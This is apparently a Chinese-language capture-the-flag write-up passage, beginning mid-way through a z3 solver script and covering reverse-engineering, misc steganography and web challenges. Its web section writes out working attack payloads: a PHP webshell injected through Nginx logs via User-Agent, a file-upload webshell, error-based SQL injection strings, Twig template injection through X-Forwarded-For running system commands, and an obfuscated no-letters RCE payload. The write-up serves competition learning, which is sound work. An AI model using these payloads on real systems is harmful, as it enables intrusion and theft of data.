solver.add(-e[0] * 82498 + e[1] * 62338 + e[2] * 37915 - e[3] * 70538 - e[4] * 79713 - e[5] * 66707 + e[6] * 78552 + e[7] * 51070 - e[8] * 44539 - e[9] * 74338 + e[10] * 46155 + e[11] * 97700 - e[12] * 18565 + e[13] * 61269 - e[14] * 48516 + e[15] * 32732 == 4477798)
solver.add(e[0] * 70267 - e[1] * 53384 + e[2] * 99567 - e[3] * 24849 - e[4] * 77728 - e[5] * 43754 + e[6] * 95738 + e[7] * 45977 + e[8] * 19509 - e[9] * 14260 + e[10] * 57637 + e[11] * 39048 - e[12] * 44992 - e[13] * 45107 - e[14] * 24571 - e[15] * 52549 == -360409)
solver.add(-e[0] * 44685 + e[1] * 41470 + e[2] * 93450 + e[3] * 74425 - e[4] * 78655 - e[5] * 59511 - e[6] * 76950 - e[7] * 81141 - e[8] * 94285 + e[9] * 77516 - e[10] * 18621 + e[11] * 88477 - e[12] * 46913 - e[13] * 76457 + e[14] * 45201 + e[15] * 78597 == -577319)
solver.add(-e[0] * 46140 - e[1] * 81097 - e[2] * 99877 + e[3] * 58736 - e[4] * 99036 + e[5] * 52168 - e[6] * 52321 - e[7] * 94841 - e[8] * 14316 - e[9] * 13365 + e[10] * 15994 - e[11] * 58210 + e[12] * 42112 - e[13] * 65677 + e[14] * 63161 - e[15] * 29028 == -25379650)
solver.add(-e[0] * 12571 - e[1] * 21323 + e[2] * 10818 + e[3] * 77335 - e[4] * 60343 - e[5] * 76014 - e[6] * 59738 + e[7] * 26112 - e[8] * 86749 + e[9] * 19794 - e[10] * 23832 - e[11] * 88221 - e[12] * 28711 + e[13] * 43034 + e[14] * 77706 + e[15] * 26727 == -10344735)
solver.add(e[0] * 31000 - e[1] * 73897 - e[2] * 70258 - e[3] * 62257 - e[4] * 90555 + e[5] * 55147 + e[6] * 11481 - e[7] * 83038 + e[8] * 56923 + e[9] * 35109 + e[10] * 50520 + e[11] * 47625 + e[12] * 77072 + e[13] * 81315 - e[14] * 72958 + e[15] * 83192 == 6793130)
solver.add(e[0] * 80898 + e[1] * 47590 - e[2] * 48110 + e[3] * 95070 - e[4] * 61123 + e[5] * 86752 - e[6] * 27958 - e[7] * 67162 + e[8] * 65280 + e[9] * 79917 - e[10] * 21768 - e[11] * 98200 - e[12] * 53083 + e[13] * 19953 + e[14] * 23497 - e[15] * 35363 == -3458033)
if solver.check() == sat:
model = solver.model()
solution = [model[e[i]] for i in range(16)]
print("Solution:", solution)
else:
print("No solution found.")
sm4加密模式是ECB,不需要IV向量,直接用工具解出
合成大硅胶
首先可以定位到这里的base64编码
编码出来时是fake flag
看到下面有个for 循环很可疑
全局搜索storeField
便可以找到一个数组
下面这个for循环是将上面的数组一排一排地传入storeField
结合这里有个tohexstring,多次尝试疑似可以成功的编码
最后是将上面的数组每个元素转化为十六进制拼接起来,然后转化为ascii码,base64解码
from base64 import *
hex_string = "546c4e5451315247657a51324e544a6a4d6a5a6c4c5749314e6d55744e4455785a6931694e6d59304c574d304e6a56694f444d774f574a6a4e58303d"
array = [hex_string[i:i+2] for i in range(0, len(hex_string), 2)]
int_array = [int(x, 16) for x in array]
ascii_array = [chr(x) for x in int_array]
ascii_string = ''.join(ascii_array)
print(b64decode(ascii_string))
中间有个小插曲,就是我的高版本jadx找不到storeField下面的数组,后面换了个低版本jadx打开才看到,不知道为什么
Misc
ez-QR
gif分帧合成二维码
怎么全是01,我flag呢
用gpt梭成一个二维码,1为黑色0为白色
天干物燥,注意防火
图中有个博文广告,上高德搜
定位广安市广安区
关键词搜索
将时间转化为md5小23位就行
少年的ctf奇遇
后半段flag:随波逐流一键修复宽高
前半段flag:lsp隐写,RGB,三色全调0
来听歌啦!!!
非预期接:用十六进制工具查看源码,一眼丁真
逆天方式ADS
首先根据提示了解ADS
然后根据提示了解albam
解压,一眼猪圈密码
解密即可
day1
base64隐写隐藏解压密码
然后base64转图片
import base64
from PIL import Image
from io import BytesIO
base64_string ='base码'
base64_string = base64_string.replace(' ', '').replace('\n', '')
image_data = base64.b64decode(base64_string)
image = Image.open(BytesIO(image_data))
image.save('output.jpg', 'JPEG')
day2
SSTV隐写 --->rar密码
解压后还没想好怎么做
wc,是巨硬领域大蛇!
第一段flag:
识别文件头,发现是pdf文件,改格式打开
想到pdf隐写
使用wbStego4.3open.exe
无密码,直接点点点,出flag
第二段flag:
zip中有大量xml文件,搜索即可得知这是office的文件,flag2是docx,修改后缀后打开
把隐藏给关了
第三段flag:
这是xlsx表格,但有了上一轮的经验,直接打开源文件查了,然后在第二个表中找到这里的东西,这是arcii字符,直接转化即可
所有拼接起来即可
Web
php躲猫猫
进入/getfile.php并按要求md5绕过
然后尝试php伪协议利用include漏洞失败
用wappalyzer查看web服务器
服务器是Nginx,上网搜素关键词便能查到Nginx日志注入
但我查到的网上都说的用webshell来做,但他们都是get传参,这个是post我不知道咋弄,但都是user agent注入,而且是输入php文件,直接输入<?php system('cat /f1ag,php');?>
成功爆出来了
The Beginning
ctrl U打开看源码
UploadBaby
前端上传jpg
burp抓包后端改php传webshell,蚁剑连接
http标头
Date :Tue, 20 Aug 2024 00:00:00 GMT
User-Agent : BlackMonkey
Cookie:cookie=BlackMonkey
Referer:wukong
X-Forwarded-For:127.0.0.1
ez_sql
报错注入
爆出数据库名字
-1'and(select extractvalue(1,concat('~',(select database()))))
爆出所有数据库名
-1'and(select extractvalue(1,concat('~',(select group_concat(schema_name) from information_schema.schemata))))#
爆出数据库ctf下所有的表
-1'and(select extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='ctf'))))#
爆出test_db数据库下test_tb表所有的列名
-1'and(select extractvalue(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name="ctf" and table_schema='flag'))))#
查询flag
-1'and(select extractvalue(1,concat('~',(select substr((select data from flag), 1 , 31)))))# 0-30位 左边30位
-1'and(select extractvalue(1,concat('~',(select substr((select data from flag), 31 , 60)))))# 31-60位 右边边31位
看看ip
xff注入
X-Forwarded-For: 1 测试可否回显
PHP可能存在Twig模版注入漏洞
X-Forwarded-For: {{7*7}} 执行
X-Forwarded-For: {{system('ls /')}}爆表
X-Forwarded-For: {{system('cat /flag')}} payload
青春莫尔斯冲锋狙不会梦到pro速帕里46轮椅人
无符号rce,直接尝试各种脚本,首先异或是不行的,或貌似可以,但取反简单,我就去抄了个取反的
payload:(~%8F%97%8F%96%91%99%90)();